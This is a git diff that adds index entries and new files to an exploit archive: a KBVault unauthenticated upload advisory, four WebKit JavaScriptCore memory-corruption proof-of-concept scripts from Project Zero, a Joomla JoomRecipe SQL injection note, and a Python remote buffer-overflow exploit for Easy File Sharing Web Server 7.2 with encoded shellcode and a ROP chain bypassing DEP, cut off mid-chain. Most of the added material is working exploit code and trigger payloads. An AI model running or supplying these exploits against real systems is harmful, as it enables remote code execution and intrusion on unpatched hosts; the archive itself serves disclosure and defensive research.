diff --git a/files.csv b/files.csv
index e39c747d4..db729746c 100644
--- a/files.csv
+++ b/files.csv
@@ -5544,6 +5544,10 @@ id,file,description,date,author,platform,type,port
 42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0
 42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0
 42182,platforms/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos,0
+42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0
+42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
+42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
+42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15602,6 +15606,7 @@ id,file,description,date,author,platform,type,port
 42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
+42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38009,3 +38014,5 @@ id,file,description,date,author,platform,type,port
 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
 42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
+42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
+42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
diff --git a/platforms/aspx/webapps/42184.txt b/platforms/aspx/webapps/42184.txt
new file mode 100755
index 000000000..bcbef9984
--- /dev/null
+++ b/platforms/aspx/webapps/42184.txt
@@ -0,0 +1,33 @@
+# Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code]
+# Google Dork: [inurl:"FileExplorer/Explorer.aspx"]
+# Date: [2017-06-14]
+# Exploit Author: [Fatih Emiral]
+# Vendor Homepage: [http://kbvaultmysql.codeplex.com/]
+# Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806]
+# Version: [0.16a]
+# Tested on: [Windows 7 (applicable to all Windows platforms)]
+# CVE : [CVE-2017-9602]
+
+1. Description
+
+KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI:
+
+http://host/FileExplorer/Explorer.aspx?id=/Uploads
+
+2. Exploit
+
+Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.:
+
+http://host/Uploads/Documents/cmd.aspx
+
+3. Solution
+
+Unauthenticated access to the file management function should be prohibited.
+File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload.
+
+4. Disclosure Timeline
+
+2017-06-09: Vendor notification
+2017-06-09: Vendor responded with intention to fix the vulnerability
+2017-06-12: CVE number acquired
+2017-06-15: Public disclosure
\ No newline at end of file
diff --git a/platforms/multiple/dos/42188.html b/platforms/multiple/dos/42188.html
new file mode 100755
index 000000000..8094772b7
--- /dev/null
+++ b/platforms/multiple/dos/42188.html
@@ -0,0 +1,123 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1208
+
+After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.
+
+void JSGlobalObject::haveABadTime(VM& vm)
+{
+	...
+    for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)
+        m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage));  <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage
+    ...
+    while (!foundObjects.isEmpty()) {
+        JSObject* object = asObject(foundObjects.last());
+        foundObjects.removeLast();
+        ASSERT(hasBrokenIndexing(object));
+        object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array
+    }
+}
+
+
+1. fastSlice:
+JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)
+{
+    auto arrayType = indexingType();
+    switch (arrayType) {
+    case ArrayWithDouble:
+    case ArrayWithInt32:
+    case ArrayWithContiguous: {
+        VM& vm = exec.vm();
+        if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))
+            return nullptr;
+
+        Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);
+        JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);
+        if (!resultArray)
+            return nullptr;
+
+        auto& resultButterfly = *resultArray->butterfly();
+        if (arrayType == ArrayWithDouble)
+            memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);
+        else
+            memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);
+        resultButterfly.setPublicLength(count);
+
+        return resultArray;
+    }
+    default:
+        return nullptr;
+    }
+}
+
+If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
+
+<html>
+<body>
+<script>
+
+Array.prototype.__defineGetter__(100, () => 1);
+
+let f = document.body.appendChild(document.createElement('iframe'));
+let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);
+
+let c = Array.prototype.slice.call(a);
+alert(c);
+
+</script>
+</body>
+</html>
+
+2. arrayProtoPrivateFuncConcatMemcpy
+EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)
+{
+...
+    JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
+    ...
+    IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);
+    ...
+    Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);
+    JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);
+    if (!result)
+        return JSValue::encode(throwOutOfMemoryError(exec, scope));
+    
+    if (type == ArrayWithDouble) {
+        double* buffer = result->butterfly()->contiguousDouble().data();
+        memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);
+        memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);
+    } else if (type != ArrayWithUndecided) {
+        WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();
+        memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);
+        if (secondType != ArrayWithUndecided)
+            memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);
+        else {
+            for (unsigned i = secondArraySize; i--;)
+                buffer[i + firstArraySize].clear();
+        }
+    }
+
+    result->butterfly()->setPublicLength(firstArraySize + secondArraySize);
+    return JSValue::encode(result);
+}
+
+If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
+
+PoC:
+-->
+
+<html>
+<body>
+<script>
+
+Array.prototype.__defineGetter__(100, () => 1);
+
+let f = document.body.appendChild(document.createElement('iframe'));
+let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
+let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
+
+let c = Array.prototype.concat.call(a, b);
+
+alert(c);
+
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/multiple/dos/42189.html b/platforms/multiple/dos/42189.html
new file mode 100755
index 000000000..f408f4b69
--- /dev/null
+++ b/platforms/multiple/dos/42189.html
@@ -0,0 +1,44 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1218&desc=2
+
+Here's a snippet of arrayProtoFuncSplice.
+
+EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
+{
+    ...
+            result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
+            if (!result)
+                return JSValue::encode(throwOutOfMemoryError(exec, scope));
+            
+            for (unsigned k = 0; k < actualDeleteCount; ++k) {
+                JSValue v = getProperty(exec, thisObj, k + actualStart);
+                RETURN_IF_EXCEPTION(scope, encodedJSValue());
+                if (UNLIKELY(!v)) {
+                    continue;
+                }
+                result->initializeIndex(vm, k, v);
+            }
+    ...
+}
+
+|JSArray::tryCreateForInitializationPrivate| will return an uninitialized JSArray. So the next routine must clear its all indices. But the routine skips holes in |thisObj|. This is fine under normal circumstances because the type of |result| will be ArrayWithUndecided, unless you're having a bad time. We can force |result|'s type to ArrayWithSlowPutArrayStorage by using |JSGlobalObject::haveABadTime|.
+
+PoC:
+-->
+
+function gc() {
+    for (let i = 0; i < 0x10; i++)
+        new ArrayBuffer(0x1000000);
+}
+
+Array.prototype.__defineGetter__(0x1000, () => 1);
+
+gc();
+
+for (let i = 0; i < 0x100; i++) {
+    new Array(0x100).fill(1234.5678);
+}
+
+gc();
+
+print(new Array(0x100).splice(0));
\ No newline at end of file
diff --git a/platforms/multiple/dos/42190.html b/platforms/multiple/dos/42190.html
new file mode 100755
index 000000000..cf6bf6543
--- /dev/null
+++ b/platforms/multiple/dos/42190.html
@@ -0,0 +1,51 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1220
+
+When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
+For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.
+
+function f() {
+    let arr = new Uint32Array(10);
+    for (let i = 0; i < 0x100000; i++) {
+        parseInt();
+    }
+    arr[8] = 1;
+    arr[5] = 2;
+    arr[2] = 3;
+}
+
+f();
+
+Note: parseInt is for forcing to start the JIT optimization.
+
+Here's a snippet IntegerCheckCombiningPhase::handleBlock.
+
+void handleBlock(BlockIndex blockIndex)
+{
+    ...
+        if (range.m_count) {
+            if (data.m_addend > range.m_maxBound) {
+                range.m_maxBound = data.m_addend;
+                range.m_maxOrigin = node->origin.semantic;
+            } else if (data.m_addend < range.m_minBound) {
+                range.m_minBound = data.m_addend;
+                range.m_minOrigin = node->origin.semantic;
+            }
+    ...
+}
+
+The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.
+
+PoC:
+-->
+
+function f() {
+    let arr = new Uint32Array(10);
+    for (let i = 0; i < 0x100000; i++) {
+        parseInt();
+    }
+    arr[8] = 1;
+    arr[-0x12345678] = 2;
+}
+
+f();
\ No newline at end of file
diff --git a/platforms/multiple/dos/42191.html b/platforms/multiple/dos/42191.html
new file mode 100755
index 000000000..f6985eeac
--- /dev/null
+++ b/platforms/multiple/dos/42191.html
@@ -0,0 +1,40 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1229
+
+Here's tryCreateArrayButterfly which is invoked from intlObjectFuncGetCanonicalLocales to create a JSArray object.
+
+inline Butterfly* tryCreateArrayButterfly(VM& vm, JSCell* intendedOwner, unsigned initialLength)
+{
+    Butterfly* butterfly = Butterfly::tryCreate(
+        vm, intendedOwner, 0, 0, true, baseIndexingHeaderForArrayStorage(initialLength),
+        ArrayStorage::sizeFor(BASE_ARRAY_STORAGE_VECTOR_LEN));
+    if (!butterfly)
+        return nullptr;
+    ArrayStorage* storage = butterfly->arrayStorage();
+    storage->m_sparseMap.clear();
+    storage->m_indexBias = 0;
+    storage->m_numValuesInVector = 0;
+    return butterfly;
+}
+
+It allocates a fixed size(BASE_ARRAY_STORAGE_VECTOR_LEN) of memory without caring about |initialLength|. So a BOF occurs in the following iteration.
+
+EncodedJSValue JSC_HOST_CALL intlObjectFuncGetCanonicalLocales(ExecState* state)
+{
+    ...
+    auto length = localeList.size();
+    for (size_t i = 0; i < length; ++i) {
+        localeArray->initializeIndex(vm, i, jsString(state, localeList[i]));
+        RETURN_IF_EXCEPTION(scope, encodedJSValue());
+    }
+    ...
+}
+
+
+PoC:
+-->
+
+Object.prototype.__defineGetter__(1000, () => 2);
+
+let locales = ['mr', 'bs', 'ee-TG', 'ms', 'kam-KE', 'mt', 'ha', 'es-HN', 'ml-IN', 'ro-MD', 'kab-DZ', 'he', 'es-CO', 'my', 'es-PA', 'az-Latn', 'mer', 'en-NZ', 'xog-UG', 'sg', 'fr-GP', 'sr-Cyrl-BA', 'hi', 'fil-PH', 'lt-LT', 'si', 'en-MT', 'si-LK', 'luo-KE', 'it-CH', 'teo', 'mfe', 'sk', 'uz-Cyrl-UZ', 'sl', 'rm-CH', 'az-Cyrl-AZ', 'fr-GQ', 'kde', 'sn', 'cgg-UG', 'so', 'fr-RW', 'es-SV', 'mas-TZ', 'en-MU', 'sq', 'hr', 'sr', 'en-PH', 'ca', 'hu', 'mk-MK', 'fr-TD', 'nb', 'sv', 'kln-KE', 'sw', 'nd', 'sr-Latn', 'el-GR', 'hy', 'ne', 'el-CY', 'es-CR', 'fo-FO', 'pa-Arab-PK', 'seh', 'ar-YE', 'ja-JP', 'ur-PK', 'pa-Guru', 'gl-ES', 'zh-Hant-HK', 'ar-EG', 'nl', 'th-TH', 'es-PE', 'fr-KM', 'nn', 'kk-Cyrl-KZ', 'kea', 'lv-LV', 'kln', 'tzm-Latn', 'yo', 'gsw-CH', 'ha-Latn-GH', 'is-IS', 'pt-BR', 'cs', 'en-PK', 'fa-IR', 'zh-Hans-SG', 'luo', 'ta', 'fr-TG', 'kde-TZ', 'mr-IN', 'ar-SA', 'ka-GE', 'mfe-MU', 'id', 'fr-LU', 'de-LU', 'ru-MD', 'cy', 'zh-Hans-HK', 'te', 'bg-BG', 'shi-Latn', 'ig', 'ses', 'ii', 'es-BO', 'th', 'ko-KR', 'ti', 'it-IT', 'shi-Latn-MA', 'pt-MZ', 'ff-SN', 'haw', 'zh-Hans', 'so-KE', 'bn-IN', 'en-UM', 'to', 'id-ID', 'uz-Cyrl', 'en-GU', 'es-EC', 'en-US-posix', 'sr-Latn-BA', 'is', 'luy', 'tr', 'en-NA', 'it', 'da', 'bo-IN', 'vun-TZ', 'ar-SD', 'uz-Latn-UZ', 'az-Latn-AZ', 'de', 'es-GQ', 'ta-IN', 'de-DE', 'fr-FR', 'rof-TZ', 'ar-LY', 'en-BW', 'asa', 'zh', 'ha-Latn', 'fr-NE', 'es-MX', 'bem-ZM', 'zh-Hans-CN', 'bn-BD', 'pt-GW', 'om', 'jmc', 'de-AT', 'kk-Cyrl', 'sw-TZ', 'ar-OM', 'et-EE', 'or', 'da-DK', 'ro-RO', 'zh-Hant', 'bm-ML', 'ja', 'fr-CA', 'naq', 'zu', 'en-IE', 'ar-MA', 'es-GT', 'uz-Arab-AF', 'en-AS', 'bs-BA', 'am-ET', 'ar-TN', 'haw-US', 'ar-JO', 'fa-AF', 'uz-Latn', 'en-BZ', 'nyn-UG', 'ebu-KE', 'te-IN', 'cy-GB', 'uk', 'nyn', 'en-JM', 'en-US', 'fil', 'ar-KW', 'af-ZA', 'en-CA', 'fr-DJ', 'ti-ER', 'ig-NG', 'en-AU', 'ur', 'fr-MC', 'pt-PT', 'pa', 'es-419', 'fr-CD', 'en-SG', 'bo-CN', 'kn-IN', 'sr-Cyrl-RS', 'lg-UG', 'gu-IN', 'ee', 'nd-ZW', 'bem', 'uz', 'sw-KE', 'sq-AL', 'hr-HR', 'mas-KE', 'el', 'ti-ET', 'es-AR', 'pl', 'en', 'eo', 'shi', 'kok', 'fr-CF', 'fr-RE', 'mas', 'rof', 'ru-UA', 'yo-NG', 'dav-KE', 'gv-GB', 'pa-Arab', 'es', 'teo-UG', 'ps', 'es-PR', 'fr-MF', 'et', 'pt', 'eu', 'ka', 'rwk-TZ', 'nb-NO', 'fr-CG'];
+Intl.getCanonicalLocales(locales);
\ No newline at end of file
diff --git a/platforms/php/webapps/42185.txt b/platforms/php/webapps/42185.txt
new file mode 100755
index 000000000..d0585a174
--- /dev/null
+++ b/platforms/php/webapps/42185.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component JoomRecipe 1.0.3 - SQL Injection
+# Dork: N/A
+# Date: 15.06.2017
+# Vendor : http://joomboost.com/
+# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
+# Demo: http://demo-joomrecipe.joomboost.com/
+# Version: 1.0.3
+# # # # #
+# Author: EziBilisim
+# Author Web: https://ezibilisim.com/
+# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/all-recipes/category/[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/remote/42186.py b/platforms/windows/remote/42186.py
new file mode 100755
index 000000000..e12f21a5c
--- /dev/null
+++ b/platforms/windows/remote/42186.py
@@ -0,0 +1,168 @@
+#!/usr/bin/python
+
+# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
+# Exploit Author: bl4ck h4ck3r
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: Easy File Sharing Web Server v7.2
+# Tested on: Windows XP SP2, Windows 2008 R2 x64
+
+import socket
+import struct
+import sys
+
+if len(sys.argv) < 2:
+    print "\nUsage: " + sys.argv[0] + " <host>\n"
+    exit()
+
+# 0x1002280a :  # ADD ESP,1004 # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+ret = struct.pack("<I", 0x1002280a)
+
+# nopsled
+shellcode = "\x90"*200
+
+# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
+shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
+shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
+shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
+shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
+shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
+shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
+shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
+shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
+shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
+shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
+shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
+shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
+shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
+shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
+shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
+shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
+shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
+shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
+shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
+shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
+shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
+shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
+shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
+shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
+shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
+shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
+shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
+shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
+shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
+shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
+shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
+shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
+shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
+shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
+shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
+shellcode += "\x45\x50\x41\x41"
+
+def create_rop_chain():
+	
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+		# 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
+		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+		0xFFFFFDFE,  # -202
+		0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
+		0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]|   {PAGE_EXECUTE_READ}
+		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+		0x1004de84,  # &Writable location [ImageLoad.dll]
+
+		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+		0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
+		0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+		0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
+		0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
+		0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
+		0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
+		0x61c24169,  # & push esp # ret  [sqlite3.dll]
+		0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
